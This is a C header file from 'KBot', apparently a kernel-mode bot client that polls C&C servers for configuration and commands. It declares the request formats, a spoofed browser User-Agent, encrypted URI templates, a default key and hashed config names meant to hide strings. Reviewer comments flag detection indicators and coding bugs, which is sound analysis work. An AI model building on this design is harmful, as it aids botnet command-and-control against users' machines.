//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
// KBot project.
//
// module: kbot.h
// $Revision: 33 $
// $Date: 2012-07-16 18:27:23 +0400 (Пн, 16 июл 2012) $
// description:
// Kernel-mode client program.
// Connects over the KIP to one of the specified C&C servers and receives specially formed configuration files and commands.
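// Build switches.
// _ENCRYPT_REQUEST_URI is tested with #ifdef further down in this header, so only its
// presence matters: defining it as FALSE would still select the encrypted URI templates.
#define _ENCRYPT_REQUEST_URI TRUE
// Not referenced anywhere in this header; presumably gates signature verification of
// received data in the implementation (confirm against the .c files).
#define _USE_DIGITAL_SIGNATURE TRUE

// Client version; the request template szRequestFmt has a "version=%u" field that
// presumably carries this value.
#define KBOT_VERSION 0x100

// Timing defaults. The arithmetic is parenthesized so that each macro expands to a single
// value inside a larger expression (e.g. `x / KBOT_MINIMUM_REQUEST_PERIOD`).
#define KBOT_WAIT_BEFORE_START (2*60*1000) // milliseconds (2 minutes)
#define KBOT_DEFAULT_CONFIG_PERIOD 60 // seconds
#define KBOT_DEFAULT_TASK_PERIOD (60*60*24*365) // seconds (365 days)
#define KBOT_MINIMUM_REQUEST_PERIOD (2*60) // seconds (2 minutes)

// Size of the buffer used for received content, judging by the name (4 KiB).
#define KBOT_CONTENT_BUFFER_SIZE 0x1000 // bytes

// Fixed names of the configuration file and the user-ID file.
// For an analyst these are stable host-side strings to search for.
#define szKBotConfigFileName "KBOT.INI"
#define szKBotUserIdFileName "USER.ID"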
// Precomputed 32-bit constants, one per configuration item name.
// Presumably each is a CRC of the corresponding name string (PUBLIC_KEY, KBOT_INI, GROUP,
// TASK_PERIOD, CONFIG_PERIOD, HOSTS, KEY), so entries can be matched without the plaintext
// names appearing in the binary. TODO confirm the CRC variant against the parser.
// The numeric values are fixed and can be searched for in a compiled image.
#define CRC_PUBLIC_KEY 0xe1285e64
#define CRC_KBOT_INI 0x507fbe32
#define CRC_GROUP 0x656b798a
#define CRC_TASK_PERIOD 0x7c440bb2
#define CRC_CONFIG_PERIOD 0x986016fd
#define CRC_HOSTS 0xd0665bf6
#define CRC_KEY 0xe3c816dc
// Query-string template for requests to the server: version, a user value printed as four
// hex words (presumably the GUID held in KBOT_USER - confirm), server, id and crc.
// The field names and their order are constant, which makes the decoded request a stable
// network indicator.
#define szRequestFmt "version=%u&user=%x%x%x%x&server=%u&id=%u&crc=%x"
// User-Agent template: a fixed MSIE 7.0 string with the Windows NT major.minor version
// filled in and szX64 (or presumably an empty string) inserted before " SV1".
// Everything except the two digits and the x64 token is constant, so the string can be
// matched in proxy or HTTP logs.
#define szUserAgentFmt "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT %1u.%1u;%s SV1)"
#define szX64 " x64;"
// NOTE(review): #ifdef checks only that the macro is defined, not its value; with
// `#define _ENCRYPT_REQUEST_URI FALSE` this branch would still be taken.
#ifdef _ENCRYPT_REQUEST_URI
// Hard-coded default key. Presumably used for the request URI encryption until a key
// arrives with the configuration (see CRC_KEY / KBOT_CONFIG.pKey) - confirm.
// Anything protected only by this default is recoverable by anyone holding the binary.
#define SERVER_DEFAULT_KEY "0123456789ABCDEF"
// Encrypted-mode URI templates: "/c<s>.php?<s>=" for configuration and "/t<s>.php?<s>="
// for tasks. What fills the two %s placeholders is not visible in this header.
#define szConfigUri "/c%s.php?%s="
#define szTaskUri "/t%s.php?%s="
#else
// Plaintext-mode URI prefixes.
#define szConfigUri "/config.php?"
#define szTaskUri "/task.php?"
#endif
// Built-in host list, with a leading and a trailing space around the single entry.
// 10.30.29.241 is an RFC 1918 private address, so this looks like a lab/development
// default rather than a production server.
#define KBOT_DEFAULT_HOST_LIST " 10.30.29.241 "
// Sentinel for "no valid index"; presumably compared against KBOT_CONFIG.HostIndex.
#define INVALID_INDEX (-1)
// Runtime configuration of the client: polling periods, server/group identifiers,
// the list of hosts to contact and the key.
typedef struct _KBOT_CONFIG
{
#if DBG
// Debug-only structure tag, checked by ASSERT_KBOT_CONFIG against KBOT_CONFIG_MAGIC.
// Present only in DBG builds, so the structure layout differs between build types.
ULONG Magic;
#endif
// Presumably the CRC of the configuration currently held (the request template has a
// matching "crc=%x" field) - confirm.
ULONG ConfigCRC;
ULONG ConfigPeriod; // seconds
ULONG TaskPeriod; // seconds
ULONG MinimumPeriod; // seconds
ULONG ServerId;
ULONG GroupId;
// Host list state. Presumably HostArray holds HostCount pointers into the pHostList
// buffer and HostIndex selects the current entry; ownership and lifetime of both
// buffers are not visible from this header - TODO confirm.
PCHAR* HostArray;
PCHAR pHostList;
ULONG HostCount;
ULONG HostIndex;
// Key string; presumably replaces SERVER_DEFAULT_KEY once a configuration supplies one.
PCHAR pKey;
} KBOT_CONFIG, *PKBOT_CONFIG;
// Per-installation identity: a single GUID.
// Presumably persisted in the file named by szKBotUserIdFileName and sent in the
// "user=" field of szRequestFmt - confirm against the implementation.
typedef struct _KBOT_USER
{
GUID Id; // current user ID
} KBOT_USER, *PKBOT_USER;
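// Debug tag stored in KBOT_CONFIG.Magic. Multi-character constants have an
// implementation-defined value; on the usual little-endian Windows toolchains the bytes
// presumably read "KBOT" in a memory dump.
#define KBOT_CONFIG_MAGIC 'TOBK'
// Checks that x points to a KBOT_CONFIG carrying the expected tag. The argument is
// parenthesized so that expressions such as `base + 1` bind correctly before `->`.
// KBOT_CONFIG.Magic exists only under DBG, so this relies on ASSERT compiling to nothing
// in non-DBG builds.
#define ASSERT_KBOT_CONFIG(x) ASSERT((x)->Magic == KBOT_CONFIG_MAGIC)
// Built-in server and group identifiers; presumably the initial values of
// KBOT_CONFIG.ServerId and KBOT_CONFIG.GroupId - confirm.
#define KBOT_DEFAULT_SERVER_ID 12
#define KBOT_DEFAULT_GROUP_ID 1012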
// Global User-Agent string; presumably built from szUserAgentFmt at startup - confirm.
// NOTE(review): this line is a (tentative) definition, not an `extern` declaration, so
// every translation unit that includes this header gets its own definition of the symbol.
// Whether that links cleanly depends on the toolchain; a single definition in one .c file
// with `extern` here would be the conventional form.
PCHAR g_KbotUserAgent;
// Entry point that starts the client; returns an NTSTATUS. The implementation is not
// part of this header.
NTSTATUS KBotStartup(VOID);
// Counterpart to KBotStartup; takes no arguments and returns nothing.
VOID KBotCleanup(VOID);